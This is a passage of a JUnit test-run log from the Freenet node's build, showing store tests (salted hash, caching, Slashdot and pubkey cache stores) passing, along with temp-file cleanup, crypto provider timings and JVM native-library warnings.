    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] teststore cleaner in progress: 0/20
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] Shutting down...
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testRAMStoreOldBlocks took 8,65 sec
    [junit] Testcase: testMigrateKeyed took 0,536 sec
    [junit] Testcase: testSaltedStoreOldBlock took 1,913 sec
    [junit] Testcase: testMigrate took 0,135 sec
    [junit] Testcase: testSaltedStoreWithClose took 11,16 sec
    [junit] Testcase: testRAMStore took 0,044 sec
    [junit] Testcase: testSaltedStore took 0,462 sec
    [junit] Testcase: testSaltedStoreResize took 5,369 sec
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Running freenet.store.SimplePubkeyCacheTest
    [junit] Testsuite: freenet.store.SimplePubkeyCacheTest
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi763237010618395458lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,743 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,743 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSimple took 2,308 sec
    [junit] Running freenet.store.SlashdotStoreTest
    [junit] Testsuite: freenet.store.SlashdotStoreTest
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi4529179146234517394lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12403660ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12357145ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] DELETING FILE tmp-slashdotstoretest/temp-5cbc7b772b053911
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 12,93 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 12,93 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12403660ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12357145ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] DELETING FILE tmp-slashdotstoretest/temp-5cbc7b772b053911
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testDeletion took 12,166 sec
    [junit] Testcase: testSimple took 0,247 sec
    [junit] Running freenet.store.caching.CachingFreenetStoreTest
    [junit] Testsuite: freenet.store.caching.CachingFreenetStoreTest
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi3181800319206520722lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12131876ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12277187ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter) for testCachingFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreSSK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreOnClose
    [junit] Successfully closed store testCachingFreenetStoreOnClose
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnClose.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnClose.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnClose.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreTimeExpire
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreTimeExpire.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreTimeExpire.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreTimeExpire.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter) for testCachingFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Tests run: 12, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 18,69 sec
    [junit] Tests run: 12, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 18,69 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12131876ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12277187ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreSSK
    [junit] Successfully closed store testCachingFreenetStoreOnClose
    [junit] Successfully closed store testCachingFreenetStoreOnClose
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreTimeExpire
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter) for testCachingFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnClose.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnClose.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnClose.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreTimeExpire.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreTimeExpire.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreTimeExpire.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter) for testCachingFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testOnCollisionsSSK took 9,649 sec
    [junit] Testcase: testSimpleCHK took 1,143 sec
    [junit] Testcase: testSimpleSSK took 1,027 sec
    [junit] Testcase: testOnCloseCHK took 0,308 sec
    [junit] Testcase: testOnCloseSSK took 0,653 sec
    [junit] Testcase: testManualWriteCollision took 0,257 sec
    [junit] Testcase: testTimeExpireCHK took 0,409 sec
    [junit] Testcase: testTimeExpireSSK took 0,86 sec
    [junit] Testcase: testCollisionsOverMaximumSize took 0,213 sec
    [junit] Testcase: testSimpleManualWrite took 0,129 sec
    [junit] Testcase: testZeroSize took 0,497 sec
    [junit] Testcase: testOverMaximumSize took 2,974 sec
    [junit] Shutting down...
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreOnClose
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreOnClose
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreTimeExpire
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreSSK
    [junit] Successfully closed store testCachingFreenetStoreSSK
    [junit] Successfully closed store testCachingFreenetStoreSSK
    [junit] Successfully closed store testCachingFreenetStoreSSK
    [junit] Running freenet.store.saltedhash.SaltedHashFreenetStoreTest
    [junit] Testsuite: freenet.store.saltedhash.SaltedHashFreenetStoreTest
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore
    [junit] Slot filter (tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter) for testSaltedHashFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi511529968691651791lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12325568ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12420593ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.hd
    [junit] Slot filter (tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter) for testSaltedHashFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] Successfully closed store testSaltedHashFreenetStoreOnCloseSSK
    [junit] Successfully closed store testSaltedHashFreenetStoreOnCloseSSK
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] Successfully closed store testSaltedHashFreenetStoreCHK
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreCHK.config
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore
    [junit] Successfully closed store testSaltedHashFreenetStoreSSK
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 13,027 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 13,027 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12325568ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12420593ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Successfully closed store testSaltedHashFreenetStoreOnCloseSSK
    [junit] Successfully closed store testSaltedHashFreenetStoreOnCloseSSK
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] Successfully closed store testSaltedHashFreenetStoreCHK
